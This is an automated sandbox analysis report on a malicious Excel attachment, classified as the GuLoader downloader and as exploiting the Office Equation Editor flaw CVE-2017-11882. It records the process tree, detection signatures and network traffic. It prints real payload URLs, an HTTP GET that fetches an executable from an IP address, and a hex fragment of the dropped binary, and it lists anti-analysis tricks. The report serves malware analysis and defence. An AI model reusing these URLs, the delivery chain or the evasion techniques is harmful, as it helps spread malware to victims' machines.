Loading ...

Play interactive tourEdit tour

Analysis Report BL_SGN11203184.xlsx

Overview

General Information

Sample Name:BL_SGN11203184.xlsx
Analysis ID:432590
MD5:06eb9a2b3d7113604968b87722ed242a
SHA1:2a6929b76b8b69a4e3a3766881280c63af765cb1
SHA256:1554d0f1b36381c9a323749cd62b7870c8273d8020fc81df09cb159a3bb84acc
Tags:VelvetSweatshopxlsx
Infos:

Most interesting Screenshot:

Detection

GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Droppers Exploiting CVE-2017-11882
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected GuLoader
Yara detected GuLoader
C2 URLs / IPs found in malware configuration
Detected RDTSC dummy instruction sequence (likely for instruction hammering)
Drops PE files to the user root directory
Office equation editor drops PE file
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Sigma detected: Execution from Suspicious Folder
Tries to detect virtualization through RDTSC time measurements
Abnormal high CPU Usage
Allocates a big amount of memory (probably used for heap spraying)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Document misses a certain OLE stream usually present in this Microsoft Office document type
Downloads executable code via HTTP
Drops PE files
Drops PE files to the user directory
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
PE file contains strange resources
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w7x64
  • EXCEL.EXE (PID: 1920 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
  • EQNEDT32.EXE (PID: 2396 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • vbc.exe (PID: 2824 cmdline: 'C:\Users\Public\vbc.exe' MD5: 99BBF83ABE9D6E4ECC91493E32230833)
  • cleanup

Malware Configuration

Threatname: GuLoader

{"Payload URL": "https://www.pos.nblwarehouse.my.id/bin_GgrWeMMq137.bin, http://benvenuti.rs/wp-co"}

Yara Overview

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_GuLoader_1Yara detected GuLoaderJoe Security

    Dropped Files

    SourceRuleDescriptionAuthorStrings
    C:\Users\Public\vbc.exeJoeSecurity_GuLoader_1Yara detected GuLoaderJoe Security
      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\svchost[1].exeJoeSecurity_GuLoader_1Yara detected GuLoaderJoe Security

        Memory Dumps

        SourceRuleDescriptionAuthorStrings
        00000004.00000000.2151758048.0000000000401000.00000020.00020000.sdmpJoeSecurity_GuLoader_1Yara detected GuLoaderJoe Security
          00000004.00000002.2364907663.0000000000440000.00000040.00000001.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
            00000004.00000002.2364880980.0000000000401000.00000020.00020000.sdmpJoeSecurity_GuLoader_1Yara detected GuLoaderJoe Security

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              4.2.vbc.exe.400000.1.unpackJoeSecurity_GuLoader_1Yara detected GuLoaderJoe Security
                4.0.vbc.exe.400000.0.unpackJoeSecurity_GuLoader_1Yara detected GuLoaderJoe Security

                  Sigma Overview

                  Exploits:

                  barindex
                  Sigma detected: EQNEDT32.EXE connecting to internetShow sources
                  Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 103.155.82.236, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 2396, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49167
                  Sigma detected: File Dropped By EQNEDT32EXEShow sources
                  Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2396, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\svchost[1].exe

                  System Summary:

                  barindex
                  Sigma detected: Droppers Exploiting CVE-2017-11882Show sources
                  Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2396, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 2824
                  Sigma detected: Execution from Suspicious FolderShow sources
                  Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2396, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 2824

                  Signature Overview

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection:

                  barindex
                  Antivirus detection for URL or domainShow sources
                  Source: http://103.155.82.236/fksdoc/svchost.exeAvira URL Cloud: Label: malware
                  Found malware configurationShow sources
                  Source: 00000004.00000002.2364907663.0000000000440000.00000040.00000001.sdmpMalware Configuration Extractor: GuLoader {"Payload URL": "https://www.pos.nblwarehouse.my.id/bin_GgrWeMMq137.bin, http://benvenuti.rs/wp-co"}
                  Multi AV Scanner detection for domain / URLShow sources
                  Source: http://103.155.82.236/fksdoc/svchost.exeVirustotal: Detection: 12%Perma Link
                  Multi AV Scanner detection for dropped fileShow sources
                  Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\svchost[1].exeMetadefender: Detection: 28%Perma Link
                  Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\svchost[1].exeReversingLabs: Detection: 58%
                  Source: C:\Users\Public\vbc.exeMetadefender: Detection: 28%Perma Link
                  Source: C:\Users\Public\vbc.exeReversingLabs: Detection: 58%
                  Multi AV Scanner detection for submitted fileShow sources
                  Source: BL_SGN11203184.xlsxReversingLabs: Detection: 21%

                  Exploits:

                  barindex
                  Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)Show sources
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exeJump to behavior
                  Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
                  Source: excel.exeMemory has grown: Private usage: 4MB later: 46MB
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 103.155.82.236:80
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 103.155.82.236:80

                  Networking:

                  barindex
                  Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
                  Source: TrafficSnort IDS: 2022550 ET TROJAN Possible Malicious Macro DL EXE Feb 2016 192.168.2.22:49167 -> 103.155.82.236:80
                  C2 URLs / IPs found in malware configurationShow sources
                  Source: Malware configuration extractorURLs: https://www.pos.nblwarehouse.my.id/bin_GgrWeMMq137.bin, http://benvenuti.rs/wp-co
                  Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 10 Jun 2021 13:17:37 GMTServer: Apache/2.4.47 (Win64) OpenSSL/1.1.1k PHP/7.3.28Last-Modified: Wed, 09 Jun 2021 07:07:06 GMTETag: "24000-5c44fec1ebc1c"Accept-Ranges: bytesContent-Length: 147456Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 8b 23 c4 db cf 42 aa 88 cf 42 aa 88 cf 42 aa 88 4c 5e a4 88 ce 42 aa 88 80 60 a3 88 cd 42 aa 88 f9 64 a7 88 ce 42 aa 88 52 69 63 68 cf 42 aa 88 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 03 b2 bb 47 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 10 02 00 00 30 00 00 00 00 00 00 10 1c 00 00 00 10 00 00 00 20 02 00 00 00 40 00 00 10 00 00 00 10 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 50 02 00 00 10 00 00 30 8e 02 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 24 0f 02 00 28 00 00 00 00 40 02 00 50 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 02 00 00 20 00 00 00 00 10 00 00 c4 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 e8 05 02 00 00 10 00 00 00 10 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 50 12 00 00 00 20 02 00 00 10 00 00 00 20 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 50 09 00 00 00 40 02 00 00 10 00 00 00 30 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 c3 1f b0 49 10 00 00 00 00 00 00 00 00 00 00 00 4d 53 56 42 56 4d 36 30 2e 44 4c 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                  Source: Joe Sandbox ViewASN Name: TWIDC-AS-APTWIDCLimitedHK TWIDC-AS-APTWIDCLimitedHK
                  Source: global trafficHTTP traffic detected: GET /fksdoc/svchost.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 103.155.82.236Connection: Keep-Alive
                  Source: unknownTCP traffic detected without corresponding DNS query: 103.155.82.236
                  Source: unknownTCP traffic detected without corresponding DNS query: 103.155.82.236
                  Source: unknownTCP traffic detected without corresponding DNS query: 103.155.82.236
                  Source: unknownTCP traffic detected without corresponding DNS query: 103.155.82.236
                  Source: unknownTCP traffic detected without corresponding DNS query: 103.155.82.236
                  Source: unknownTCP traffic detected without corresponding DNS query: 103.155.82.236
                  Source: unknownTCP traffic detected without corresponding DNS query: 103.155.82.236
                  Source: unknownTCP traffic detected without corresponding DNS query: 103.155.82.236
                  Source: unknownTCP traffic detected without corresponding DNS query: 103.155.82.236
                  Source: unknownTCP traffic detected without corresponding DNS query: 103.155.82.236
                  Source: unknownTCP traffic detected without corresponding DNS query: 103.155.82.236
                  Source: unknownTCP traffic detected without corresponding DNS query: 103.155.82.236
                  Source: unknownTCP traffic detected without corresponding DNS query: 103.155.82.236
                  Source: unknownTCP traffic detected without corresponding DNS query: 103.155.82.236
                  Source: unknownTCP traffic detected without corresponding DNS query: 103.155.82.236
                  Source: unknownTCP traffic detected without corresponding DNS query: 103.155.82.236
                  Source: unknownTCP traffic detected without corresponding DNS query: 103.155.82.236
                  Source: unknownTCP traffic detected without corresponding DNS query: 103.155.82.236
                  Source: unknownTCP traffic detected without corresponding DNS query: 103.155.82.236
                  Source: unknownTCP traffic detected without corresponding DNS query: 103.155.82.236
                  Source: unknownTCP traffic detected without corresponding DNS query: 103.155.82.236
                  Source: unknownTCP traffic detected without corresponding DNS query: 103.155.82.236
                  Source: unknownTCP traffic detected without corresponding DNS query: 103.155.82.236
                  Source: unknownTCP traffic detected without corresponding DNS query: 103.155.82.236
                  Source: unknownTCP traffic detected without corresponding DNS query: 103.155.82.236
                  Source: unknownTCP traffic detected without corresponding DNS query: 103.155.82.236
                  Source: unknownTCP traffic detected without corresponding DNS query: 103.155.82.236
                  Source: unknownTCP traffic detected without corresponding DNS query: 103.155.82.236
                  Source: unknownTCP traffic detected without corresponding DNS query: 103.155.82.236
                  Source: unknownTCP traffic detected without corresponding DNS query: 103.155.82.236
                  Source: unknownTCP traffic detected without corresponding DNS query: 103.155.82.236
                  Source: unknownTCP traffic detected without corresponding DNS query: 103.155.82.236
                  Source: unknownTCP traffic detected without corresponding DNS query: 103.155.82.236
                  Source: unknownTCP traffic detected without corresponding DNS query: 103.155.82.236
                  Source: unknownTCP traffic detected without corresponding DNS query: 103.155.82.236
                  Source: unknownTCP traffic detected without corresponding DNS query: 103.155.82.236
                  Source: unknownTCP traffic detected without corresponding DNS query: 103.155.82.236
                  Source: unknownTCP traffic detected without corresponding DNS query: 103.155.82.236
                  Source: unknownTCP traffic detected without corresponding DNS query: 103.155.82.236
                  Source: unknownTCP traffic detected without corresponding DNS query: 103.155.82.236
                  Source: unknownTCP traffic detected without corresponding DNS query: 103.155.82.236
                  Source: unknownTCP traffic detected without corresponding DNS query: 103.155.82.236
                  Source: unknownTCP traffic detected without corresponding DNS query: 103.155.82.236
                  Source: unknownTCP traffic detected without corresponding DNS query: 103.155.82.236
                  Source: unknownTCP traffic detected without corresponding DNS query: 103.155.82.236
                  Source: unknownTCP traffic detected without corresponding DNS query: 103.155.82.236
                  Source: unknownTCP traffic detected without corresponding DNS query: 103.155.82.236
                  Source: unknownTCP traffic detected without corresponding DNS query: 103.155.82.236
                  Source: unknownTCP traffic detected without corresponding DNS query: 103.155.82.236
                  Source: unknownTCP traffic detected without corresponding DNS query: 103.155.82.236
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F77229A3.emfJump to behavior
                  Source: global trafficHTTP traffic detected: GET /fksdoc/svchost.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 103.155.82.236Connection: Keep-Alive
                  Source: F77229A3.emf.0.drString found in binary or memory: http://www.day.com/dam/1.0

                  System Summary:

                  barindex
                  Office equation editor drops PE fileShow sources
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\svchost[1].exeJump to dropped file
                  Source: C:\Users\Public\vbc.exeProcess Stats: CPU usage > 98%
                  Source: C:\Users\Public\vbc.exeMemory allocated: 76E20000 page execute and read and writeJump to behavior
                  Source: C:\Users\Public\vbc.exeMemory allocated: 76D20000 page execute and read and writeJump to behavior
                  Source: C:\Users\Public\vbc.exeCode function: 4_2_00446A2E NtAllocateVirtualMemory,4_2_00446A2E
                  Source: C:\Users\Public\vbc.exeCode function: 4_2_00446A78 NtAllocateVirtualMemory,4_2_00446A78
                  Source: C:\Users\Public\vbc.exeCode function: 4_2_00446C20 NtAllocateVirtualMemory,4_2_00446C20
                  Source: C:\Users\Public\vbc.exeCode function: 4_2_00446AF8 NtAllocateVirtualMemory,4_2_00446AF8
                  Source: C:\Users\Public\vbc.exeCode function: 4_2_00446B94 NtAllocateVirtualMemory,4_2_00446B94
                  Source: C:\Users\Public\vbc.exeCode function: 4_2_00401C104_2_00401C10
                  Source: C:\Users\Public\vbc.exeCode function: 4_2_004055F34_2_004055F3
                  Source: C:\Users\Public\vbc.exeCode function: 4_2_00446A2E4_2_00446A2E
                  Source: C:\Users\Public\vbc.exeCode function: 4_2_004444404_2_00444440
                  Source: C:\Users\Public\vbc.exeCode function: 4_2_0044185A4_2_0044185A
                  Source: C:\Users\Public\vbc.exeCode function: 4_2_0044666C4_2_0044666C
                  Source: C:\Users\Public\vbc.exeCode function: 4_2_00446A784_2_00446A78
                  Source: C:\Users\Public\vbc.exeCode function: 4_2_0044B4094_2_0044B409
                  Source: C:\Users\Public\vbc.exeCode function: 4_2_0044341C4_2_0044341C
                  Source: C:\Users\Public\vbc.exeCode function: 4_2_004466294_2_00446629
                  Source: C:\Users\Public\vbc.exeCode function: 4_2_004438344_2_00443834
                  Source: C:\Users\Public\vbc.exeCode function: 4_2_00443A304_2_00443A30
                  Source: C:\Users\Public\vbc.exeCode function: 4_2_004432384_2_00443238
                  Source: C:\Users\Public\vbc.exeCode function: 4_2_004434C04_2_004434C0
                  Source: C:\Users\Public\vbc.exeCode function: 4_2_004436DE4_2_004436DE
                  Source: C:\Users\Public\vbc.exeCode function: 4_2_00446AF84_2_00446AF8
                  Source: C:\Users\Public\vbc.exeCode function: 4_2_004444904_2_00444490
                  Source: C:\Users\Public\vbc.exeCode function: 4_2_004432A04_2_004432A0
                  Source: C:\Users\Public\vbc.exeCode function: 4_2_00443AA04_2_00443AA0
                  Source: C:\Users\Public\vbc.exeCode function: 4_2_004466B84_2_004466B8
                  Source: C:\Users\Public\vbc.exeCode function: 4_2_0044350C4_2_0044350C
                  Source: C:\Users\Public\vbc.exeCode function: 4_2_0044450C4_2_0044450C
                  Source: C:\Users\Public\vbc.exeCode function: 4_2_004437144_2_00443714
                  Source: C:\Users\Public\vbc.exeCode function: 4_2_0044331C4_2_0044331C
                  Source: C:\Users\Public\vbc.exeCode function: 4_2_004439254_2_00443925
                  Source: C:\Users\Public\vbc.exeCode function: 4_2_00443B304_2_00443B30
                  Source: C:\Users\Public\vbc.exeCode function: 4_2_0044173C4_2_0044173C
                  Source: C:\Users\Public\vbc.exeCode function: 4_2_004439DC4_2_004439DC
                  Source: C:\Users\Public\vbc.exeCode function: 4_2_004431D84_2_004431D8
                  Source: C:\Users\Public\vbc.exeCode function: 4_2_004447ED4_2_004447ED
                  Source: C:\Users\Public\vbc.exeCode function: 4_2_004443FB4_2_004443FB
                  Source: C:\Users\Public\vbc.exeCode function: 4_2_004437884_2_00443788
                  Source: C:\Users\Public\vbc.exeCode function: 4_2_004449934_2_00444993
                  Source: C:\Users\Public\vbc.exeCode function: 4_2_004433A44_2_004433A4
                  Source: C:\Users\Public\vbc.exeCode function: 4_2_004417B84_2_004417B8
                  Source: BL_SGN11203184.xlsxOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
                  Source: svchost[1].exe.2.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                  Source: vbc.exe.2.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                  Source: classification engineClassification label: mal100.troj.expl.evad.winXLSX@4/16@0/1
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\~$BL_SGN11203184.xlsxJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRF085.tmpJump to behavior
                  Source: C:\Users\Public\vbc.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dllJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
                  Source: C:\Users\Public\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: BL_SGN11203184.xlsxReversingLabs: Detection: 21%
                  Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                  Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe' Jump to behavior
                  Source: Window RecorderWindow detected: More than 3 window changes detected
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItemsJump to behavior
                  Source: BL_SGN11203184.xlsxStatic file information: File size 1317888 > 1048576
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
                  Source: BL_SGN11203184.xlsxInitial sample: OLE indicators vbamacros = False
                  Source: BL_SGN11203184.xlsxInitial sample: OLE indicators encrypted = True

                  Data Obfuscation:

                  barindex
                  Yara detected GuLoaderShow sources
                  Source: Yara matchFile source: 00000004.00000002.2364907663.0000000000440000.00000040.00000001.sdmp, type: MEMORY
                  Yara detected GuLoaderShow sources
                  Source: Yara matchFile source: dump.pcap, type: PCAP
                  Source: Yara matchFile source: 00000004.00000000.2151758048.0000000000401000.00000020.00020000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000004.00000002.2364880980.0000000000401000.00000020.00020000.sdmp, type: MEMORY
                  Source: Yara matchFile source: C:\Users\Public\vbc.exe, type: DROPPED
                  Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\svchost[1].exe, type: DROPPED
                  Source: Yara matchFile source: 4.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 4.0.vbc.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: C:\Users\Public\vbc.exeCode function: 4_2_00409C54 push es; iretd 4_2_00409C5E
                  Source: C:\Users\Public\vbc.exeCode function: 4_2_0040605F push 00000059h; retf 4_2_00406061
                  Source: C:\Users\Public\vbc.exeCode function: 4_2_00406E64 push eax; retf 4_2_00406E65
                  Source: C:\Users\Public\vbc.exeCode function: 4_2_0040A065 pushad ; retf 4_2_0040A0B8
                  Source: C:\Users\Public\vbc.exeCode function: 4_2_00409E0D push edx; iretd 4_2_00409E12
                  Source: C:\Users\Public\vbc.exeCode function: 4_2_00409EF8 push ss; iretd 4_2_00409EFE
                  Source: C:\Users\Public\vbc.exeCode function: 4_2_00406AFE push es; iretd 4_2_00406B02
                  Source: C:\Users\Public\vbc.exeCode function: 4_2_004079CA push cs; iretd 4_2_004079CE
                  Source: C:\Users\Public\vbc.exeCode function: 4_2_00409387 push ss; iretd 4_2_004093A6
                  Source: C:\Users\Public\vbc.exeCode function: 4_2_00408D90 push cs; iretd 4_2_00408D9E
                  Source: C:\Users\Public\vbc.exeCode function: 4_2_00403191 push dword ptr [ebp-44h]; ret 4_2_0041ECA4
                  Source: C:\Users\Public\vbc.exeCode function: 4_2_00445356 push edi; iretd 4_2_00445357
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\svchost[1].exeJump to dropped file
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file

                  Boot Survival:

                  barindex
                  Drops PE files to the user root directoryShow sources
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
